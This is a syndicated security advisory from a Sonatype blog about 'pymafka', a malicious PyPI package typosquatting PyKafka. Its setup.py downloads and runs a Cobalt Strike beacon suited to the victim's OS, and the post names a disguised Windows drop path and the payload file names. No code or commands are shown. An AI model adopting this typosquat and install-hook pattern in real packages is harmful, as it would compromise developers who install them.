SBN

New ‘pymafka’ malicious package drops Cobalt Strike on macOS, Windows, Linux

This week, Sonatype’s automated malware detection bots have discovered malicious Python package ‘pymafka’ in the PyPI registry.

The package appears to typosquat a legitimate popular library PyKafka, a programmer-friendly Apache Kafka client for Python. The development follows our discovery of another typosquat targeting the Apache Kafka project from earlier this month.

PyKafka includes Python implementations of Kafka producers and consumers, and has been retrieved over 4,240,305 times by user-initiated downloads and mirrors/bots alike. By contrast, malicious ‘pymafka’ shows a download count of around 300 as Sonatype timely reported the finding to PyPI.

PyMafka drops Cobalt Strike on Windows, macOS 

On May 17th, a mysterious ‘pymafka’ package appeared on the PyPI registry. The package was shortly flagged by the Sonatype Nexus platform‘s automated malware detection capabilities.

The package, ‘pymafka’ may sound identical to the popular PyKafka, but its insides reveal a different story. 

The ‘setup.py’ Python script inside ‘pymafka’ first detects your platform. Depending on whether you are running Windows, macOS, or Linux, an appropriate malicious trojan is downloaded and executed on the infected system.

The trojan in question is a Cobalt Strike (CS) beacon. Cobalt Strike is a pen-testing software tool typically used by red teams and ethical hackers for simulating real-world cyberattacks, especially during security assessments.

But, time and time again attackers, including ransomware groups like LockBit, have abused Cobalt Strike to infect victims.

Interestingly, as evident from the code below, on Windows systems, the Python script attempts to drop the Cobalt Strike beacon at ‘C:UsersPubliciexplorer.exe’. Note, this misspelling stands out as the legitimate Microsoft Internet Explorer process is typically called “iexplore.exe” (no ‘r’ at the end) and isn’t present in the C:UsersPublic directory.

The malicious executables being downloaded are ‘win.exe’ [VirusTotal], and ‘MacOS’ [VirusTotal], with (Read more...)

*** This is a Security Bloggers Network syndicated blog from Sonatype Blog authored by Ax Sharma. Read the original post at: https://blog.sonatype.com/new-pymafka-malicious-package-drops-cobalt-strike-on-macos-windows-linux